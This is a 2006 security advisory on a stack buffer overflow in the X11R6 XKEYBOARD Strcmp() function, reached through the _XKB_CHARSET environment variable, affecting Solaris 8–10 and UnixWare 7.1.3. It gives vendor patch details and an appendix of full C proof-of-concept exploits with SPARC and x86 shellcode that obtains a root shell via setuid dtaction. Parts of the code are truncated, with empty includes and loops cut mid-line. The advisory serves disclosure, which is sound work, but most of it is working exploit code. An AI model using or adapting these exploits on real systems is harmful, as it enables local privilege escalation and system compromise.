RISE-2006001 X11R6 XKEYBOARD extension Strcmp() buffer overflow vulnerability Released: September 07, 2006 Last updated: September 07, 2006 INTRODUCTION There exists a vulnerability within a string manipulation function of the X11R6 (X11R6.4 and lower) X Window System library, which when properly exploited can lead to local compromise of the vulnerable system. This vulnerability was silently fixed in X11R6.5.1 release, but it is still present in multiple vendors operating systems source tree. This vulnerability was confirmed by us in the following versions and operating systems, other versions and operating systems may be also affected. Sun Solaris 10 SPARC/x86 Sun Solaris 9 SPARC/x86 Sun Solaris 8 SPARC/x86 SCO UnixWare 7.1.3 DETAILS This vulnerability can be triggered by invoking a dynamicaly linked binary, with _XKB_CHARSET environment variable set to a long string value, and DISPLAY environment variable set to a X Window System server with the XKEYBOARD extension enabled. This is the vulnerable function (from X11R6.4). static int #if NeedFunctionPrototypes Strcmp(char *str1, char *str2) #else Strcmp(str1, str2) char *str1, *str2; #endif { char str[256]; char c, *s; for (s = str; c = *str1++; ) { if (isupper(c)) c = tolower(c); *s++ = c; } *s = '\0'; return (strcmp(str, str2)); } The proof of concept codes we have written for this vulnerability can be found in appendix section of this document. All source codes from this document can be also downloaded from our website. http://www.risesecurity.org/ VENDOR Sun has released patches for this vulnerability, the Sun Alert ID is 102570 and it is available at the following URL: http://sunsolve.sun.com/search/document.do?assetkey=1-26-102570-1 SCO did not answer to our email. CREDITS This vulnerability was discovered by Adriano Lima and Filipe Balestra . DISCLAIMER The authors reserve the right not to be responsible for the topicality, correctness, completeness or quality of the information provided in this document. Liability claims regarding damage caused by the use of any information provided, including any kind of information which is incomplete or incorrect, will therefore be rejected. APPENDIX sol-sparc-xkb.c /* * X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC * Copyright 2006 RISE Security , * Ramon de Carvalho Valle * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ /* * Compile with the following command. * $ (g)cc -Wall -ldl -o sol-sparc-xkb sol-sparc-xkb.c * * Set the DISPLAY environment variable to a X Window System server with * XKEYBOARD extension enabled. * $ ./sol-sparc-xkb sprintf|strcpy xserver:display * */ #include #include #include #include #include #include #include #include #define BUFSIZE 13+256+64+2+1 #define FRMSIZE 64+3+1 #define ADRSIZE 2047+1 #define SHLSIZE strlen(shellcode)+1 #define DSPSIZE strlen(display)+1 #define ARGSIZE 7+1 #define ENVSIZE BUFSIZE+FRMSIZE+ADRSIZE+SHLSIZE+DSPSIZE #define PFMSIZE strlen(platform)+1 #define PRGSIZE 20+1 #define PAD(a,b,c) \ a+=((b+c)%2)?(((a%8)>4)?(16-(a%8)):(8-(a%8))):((a%8)?(12-(a%8)):4); char shellcode[]= /* 60 bytes */ "\x90\x1a\x40\x09" /* xor %o1,%o1,%o0 */ "\x82\x10\x20\x17" /* mov 0x17,%g1 */ "\x91\xd0\x20\x08" /* ta 0x08 */ "\x21\x0b\xd8\x9a" /* sethi %hi(0x2f62696e),%l0 */ "\xa0\x14\x29\x6e" /* or %l0,0x96e,%l0 */ "\x23\x0b\xdc\xda" /* sethi %hi(0x2f736800),%l1 */ "\x90\x23\xa0\x08" /* sub %sp,0x08,%o0 */ "\x92\x23\xa0\x10" /* sub %sp,0x10,%o1 */ "\x94\x1a\x80\x0a" /* xor %o2,%o2,%o2 */ "\xe0\x23\xbf\xf8" /* st %l0,[%sp-0x08] */ "\xe2\x23\xbf\xfc" /* st %l1,[%sp-0x04] */ "\xd0\x23\xbf\xf0" /* st %o0,[%sp-0x10] */ "\xc0\x23\xbf\xf4" /* st %g0,[%sp-0x0c] */ "\x82\x10\x20\x3b" /* mov 0x3b,%g1 */ "\x91\xd0\x20\x08" /* ta 0x08 */ ; void *find_symbol(const char *symbol){ void *handle,*addr; char *err; if((handle=dlmopen(LM_ID_LDSO,NULL,RTLD_LAZY))==NULL){ fprintf(stderr,"%s\n",dlerror()); exit(EXIT_FAILURE); } dlerror(); addr=dlsym(handle,symbol); if((err=dlerror())!=NULL){ fprintf(stderr,"%s\n",err); exit(EXIT_FAILURE); } dlclose(handle); return addr; } void *find_rwxmem(void){ FILE *fp; prmap_t map; int flags; void *addr; if((fp=fopen("/proc/self/map","rb"))==NULL){ perror("fopen"); exit(EXIT_FAILURE); } while(fread(&map,sizeof(map),1,fp)){ flags=map.pr_mflags; if((flags&(MA_READ|MA_WRITE|MA_EXEC))==(MA_READ|MA_WRITE|MA_EXEC)){ if(flags&MA_STACK) continue; addr=(void *)map.pr_vaddr; } } fclose(fp); return addr; } int main(int argc,char **argv){ char buf[8192],display[256],platform[256],addr[8][4],*envp[6],*p; int base,offset,i,flag=0; printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC\n"); printf("Copyright 2006 RISE Security \n\n"); if(argc!=3){ fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]); exit(EXIT_FAILURE); } if(!strcmp(argv[1],"sprintf")) flag=1; if(!strcmp(argv[1],"strcpy")) flag=2; if(!flag){ fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]); exit(EXIT_FAILURE); } snprintf(display,sizeof(display),"DISPLAY=%s",argv[2]); if(sysinfo(SI_PLATFORM,platform,sizeof(platform))==-1){ perror("sysinfo"); exit(EXIT_FAILURE); } base=((int)argv[0]|0xffff); base++; offset=ARGSIZE+ENVSIZE+PFMSIZE+PRGSIZE; PAD(offset,1,sizeof(envp)-1); *((int *)addr[0])=base-offset+ARGSIZE+BUFSIZE; *((int *)addr[1])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE; *((int *)addr[2])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE+ADRSIZE; switch(flag){ case 1: *((int *)addr[3])=(int)find_symbol("sprintf")-4; break; case 2: *((int *)addr[3])=(int)find_symbol("strcpy")-4; } *((int *)addr[4])=(int)find_rwxmem()+4; *((int *)addr[5])=*((int *)addr[4])-8; p=buf; sprintf(p,"_XKB_CHARSET="); p=buf+13; for(i=0;i<256;i++) *p++='A'; for(i=0;i<66;i++) *p++=addr[1][i%4]; *p='\0'; memcpy(buf+13+256+56,addr[0],4); memcpy(buf+13+256+60,addr[3],4); p=buf+1024;; for(i=0;i<(FRMSIZE-1);i++) *p++=addr[1][i%4]; *p='\0'; memcpy(buf+1024+32,addr[4],4); memcpy(buf+1024+36,addr[2],4); memcpy(buf+1024+60,addr[5],4); p=buf+2048; for(i=0;i<(ADRSIZE-1);i++) *p++=addr[1][i%4]; *p='\0'; envp[0]=&buf[0]; envp[1]=&buf[1024]; envp[2]=&buf[2048]; envp[3]=shellcode; envp[4]=display; envp[5]=NULL; execle("/usr/dt/bin/dtaction","AAAAAAA",0,envp); exit(EXIT_FAILURE); } sol-x86-xkb.c /* * X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86 * Copyright 2006 RISE Security , * Ramon de Carvalho Valle * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ #include #include #include #include #define ADRSIZE 1024 #define NOPSIZE 4096 char shellcode[]= /* 47 bytes */ "\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */ "\x6a\x65" /* pushl $0x65 */ "\x89\xe6" /* movl %esp,%esi */ "\xf7\x56\x04" /* notl 0x04(%esi) */ "\xf6\x16" /* notb (%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\xb0\x17" /* movb $0x17,%al */ "\xff\xd6" /* call *%esi */ "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68\x2f\x6b\x73\x68" /* pushl $0x68736b2f */ "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x50" /* pushl %eax */ "\x51" /* pushl %ecx */ "\x53" /* pushl %ebx */ "\xb0\x3b" /* movb $0x3b,%al */ "\xff\xd6" /* call *%esi */ ; int main(int argc,char **argv){ char buf[8192],display[256],addr[4],*envp[4],*p; int i; printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86\n"); printf("Copyright 2006 RISE Security \n\n"); if(argc!=2){ fprintf(stderr,"usage: %s xserver:display\n",argv[0]); exit(EXIT_FAILURE); } snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]); *((unsigned int *)addr)=(unsigned int)buf+256+1024+2048+1; p=buf; sprintf(p,"_XKB_CHARSET="); p=buf+13; for(i=0;i<256;i++) *p++='A'; for(i=0;i, * Ramon de Carvalho Valle * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * */ #include #include #include #include #define ADRSIZE 1024 #define NOPSIZE 4096 char shellcode[]= /* 43 bytes */ "\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */ "\x6a\x65" /* pushl $0x65 */ "\x89\xe6" /* movl %esp,%esi */ "\xf7\x56\x04" /* notl 0x04(%esi) */ "\xf6\x16" /* notb (%esi) */ "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\xb0\x17" /* movb $0x17,%al */ "\xff\xd6" /* call *%esi */ "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\xb0\x3b" /* movb $0x3b,%al */ "\xff\xd6" /* call *%esi */ ; int main(int argc,char **argv){ char buf[8192],display[256],addr[4],*envp[4],*p; int i; printf("X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86\n"); printf("Copyright 2006 RISE Security \n\n"); if(argc!=2){ fprintf(stderr,"usage: %s xserver:display\n",argv[0]); exit(EXIT_FAILURE); } snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]); *((unsigned int *)addr)=(unsigned int)buf+2048+256+1024+2048+1; p=buf; sprintf(p,"_XKB_CHARSET="); p=buf+13; for(i=0;i<256;i++) *p++='A'; for(i=0;i